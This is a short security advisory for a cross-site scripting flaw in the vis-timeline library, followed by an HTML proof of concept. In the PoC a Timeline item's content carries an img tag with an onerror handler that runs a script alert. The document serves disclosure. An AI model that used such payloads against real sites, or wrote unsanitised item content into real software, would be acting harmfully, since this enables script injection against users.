vis-timeline is a Timeline/Graph2D is an interactive visualization chart to visualize data in time
Affected versions of this package are vulnerable to Cross-site Scripting (XSS). An attacker with the ability to control the items of a Timeline element can inject additional script code into the generated application.
PoC
<!DOCTYPE html>
<html>
<script src="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.min.js" integrity="sha512-3FADGlV0gOpnQn56VOryrvOeY1zMrNiSMyDnxD/5ZEBJgt5n+IcAvfzm16/Cwyhro9RJgFgBWeoUmLceNgbTrA==" crossorigin="anonymous"></script>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/vis-timeline/7.4.3/vis-timeline-graph2d.css" integrity="sha512-GFG4HXPbPcM487tbwN4sscz1AVK9uQcY7Y6uWwLlgWbAXCJI2V/n7Em7vKpH+Q1cqQh1PyCavHr94KaWi0UgOA==" crossorigin="anonymous" />
<body>
<style>
body,
html {
font-family: sans-serif;
}
</style>
<p>A basic timeline. You can move and zoom the timeline, and select items.</p>
<div id="visualization"></div>
<script>
// DOM element where the Timeline will be attached
var container = document.getElementById("visualization");
// Create a DataSet (allows two way data-binding)
var items = new vis.DataSet([
{ id: 1, content: "item<img src='xxx' onerror='alert(/XSS/);' />", start: "2014-04-20" },
{ id: 2, content: "item 2", start: "2014-04-14" },
{ id: 3, content: "item 3", start: "2014-04-18" },
{ id: 4, content: "item 4", start: "2014-04-16", end: "2014-04-19" },
{ id: 5, content: "item 5", start: "2014-04-25" },
{ id: 6, content: "item 6", start: "2014-04-27", type: "point" },
]);
// Configuration for the Timeline
var options = {};
var timeline = new vis.Timeline(container, items, options);
</script>
</body>
</html>